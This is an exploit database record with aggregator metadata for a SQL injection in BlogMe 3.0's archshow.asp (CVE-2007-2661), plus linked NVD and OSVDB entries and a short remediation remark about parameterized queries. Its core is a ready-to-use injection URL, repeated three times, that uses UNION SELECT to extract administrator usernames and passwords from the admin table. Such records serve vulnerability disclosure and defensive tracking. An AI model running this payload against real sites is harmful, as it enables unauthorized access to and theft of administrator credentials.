ID EDB-ID:3914
Type exploitdb
Reporter gsy
Modified 2007-05-13T00:00:00
Description
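BlogMe 3.0 remote SQL injection vulnerability in the var parameter of archshow.asp (CVE-2007-2661). Web application exploit for the ASP platform. Per the NVD entry for this CVE, the var parameter allows a remote attacker to execute arbitrary SQL commands, and this is a different vector than CVE-2006-5976. The request recorded below uses a UNION SELECT against the admin table, so the exposure includes stored administrator usernames and passwords. This page does not mention a vendor fix; the usual remediation for this class of flaw is to pass var to the database as a bound, typed query parameter (and, if it is meant to be numeric, as the -99 value suggests, to reject non-numeric input) instead of building the SQL string from it.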
Discovered by: gsy & kerem125
Website: www.kerem125.com
Script download: http://www.drumster.net/gamma/products.asp (must buy)
exploit:/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin
Contact: by_gsy@hotmail.com & kerem125@kerem125.com
Special thx to: by_emr3, ercu_145, bolivar, voltigore, f10
# milw0rm.com [2007-05-13]
{"id": "EDB-ID:3914", "hash": "3f505de04d49fc490ffbb1b8f5b8aa19", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BlogMe 3.0 archshow.asp var Remote SQL Injection Vulnerability", "description": "BlogMe 3.0 (archshow.asp var) Remote SQL Injection Vulnerability. CVE-2007-2661. Webapps exploit for asp platform", "published": "2007-05-13T00:00:00", "modified": "2007-05-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3914/", "reporter": "gsy", "references": [], "cvelist": ["CVE-2007-2661"], "lastseen": "2016-01-31T19:35:59", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2016-01-31T19:35:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2661"]}, {"type": "osvdb", "idList": ["OSVDB:36008"]}], "modified": "2016-01-31T19:35:59"}, "vulnersScore": 7.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3914/", "sourceData": "Discoveredby:gsy&kerem125\n\nWebsite:www.kerem125.com\n\nScriptDownload:http://www.drumster.net/gamma/products.asp (must buy)\n\n\nexploit:/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin\n\n\ncontact:by_gsy@hotmail.com&kerem125@kerem125.com\nSpecialthxto:by_emr3,ercu_145,bolivar,voltigore,f10\n\n# milw0rm.com [2007-05-13]\n", "osvdbidlist": ["36008"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in archshow.asp in BlogMe 3.0 allows remote attackers to execute arbitrary SQL commands via the var parameter, a different vector than CVE-2006-5976.", "modified": "2017-10-11T01:32:00", "id": "CVE-2007-2661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2661", "published": "2007-05-14T23:19:00", "title": "CVE-2007-2661", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin\n## References:\n[Secunia Advisory ID:25229](https://secuniaresearch.flexerasoftware.com/advisories/25229/)\nISS X-Force ID: 34253\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3914\nFrSIRT Advisory: ADV-2007-1784\n[CVE-2007-2661](https://vulners.com/cve/CVE-2007-2661)\nBugtraq ID: 23956\n", "modified": "2007-05-13T04:34:00", "published": "2007-05-13T04:34:00", "href": "https://vulners.com/osvdb/OSVDB:36008", "id": "OSVDB:36008", "title": "BlogMe archshow.asp var Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}